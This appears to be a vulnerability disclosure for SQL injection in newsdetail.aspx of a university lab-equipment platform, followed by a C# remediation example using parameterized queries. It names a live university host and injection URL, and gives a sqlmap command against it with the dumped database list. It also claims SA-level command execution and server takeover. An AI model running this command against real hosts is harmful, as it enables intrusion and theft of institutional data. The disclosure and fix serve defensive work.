SQL injection with SA privileges in a teaching management system #1 (not a duplicate)
"Large instrument and equipment sharing platform system" software address: http://www.wanxinsoft.com/product1_1.asp
Some universities using the system:
Injection file: model/twogradepage/newsdetail.aspx. The database connection still has SA privileges. An attacker can even execute CMD commands directly, add an administrator account, and take over the server!
Vulnerability exploitation demonstration:
Injection point:
http://lab.hutc.zj.cn:8090/model/twogradepage/newsdetail.aspx?Id=132&columnid=70
sqlmap.py -u "http://lab.hutc.zj.cn:8090/model/twogradepage/newsdetail.aspx?Id=132&columnid=70" --dbs
Available databases [9]:
[*] Huc_eietc
[*] Huc_esatc
[*] Huc_lsetc
[*] Master
[*] Model
[*] Msdb
[*] Northwind
[*] Pubs
[*] Tempdb
Command Execution:
--------------------------------------------------------------------------------
Solution:
Filter the request parameters.
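One way to apply this fix to a page like newsdetail.aspx, as an added example that is not the vendor's code: both query parameters are validated as integers and passed as typed SQL parameters. The class name, the News table and its columns, the "LabDb" connection-string name and the two Label controls are assumptions for illustration.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

// Hypothetical code-behind for newsdetail.aspx (names are assumptions).
public partial class NewsDetail : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // 1. Filter: both parameters must be positive integers, otherwise reject.
        int id, columnId;
        if (!int.TryParse(Request.QueryString["id"], out id) || id <= 0 ||
            !int.TryParse(Request.QueryString["columnid"], out columnId) || columnId <= 0)
        {
            Response.StatusCode = 400;
            return;
        }

        // 2. "LabDb" should name a login limited to SELECT on the news tables,
        //    not sa, so a missed injection cannot reach command execution.
        string cs = ConfigurationManager.ConnectionStrings["LabDb"].ConnectionString;

        // 3. Parameterized query: values travel as typed parameters, never as SQL text.
        const string sql =
            "SELECT Title, Body FROM News WHERE Id = @id AND ColumnId = @columnId";

        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            cmd.Parameters.Add("@columnId", SqlDbType.Int).Value = columnId;
            conn.Open();
            using (SqlDataReader r = cmd.ExecuteReader(CommandBehavior.SingleRow))
            {
                if (!r.Read()) { Response.StatusCode = 404; return; }
                // TitleLabel and BodyLabel are hypothetical Label controls
                // declared in the page markup.
                TitleLabel.Text = Server.HtmlEncode(r.GetString(0));
                BodyLabel.Text = Server.HtmlEncode(r.GetString(1));
            }
        }
    }
}
```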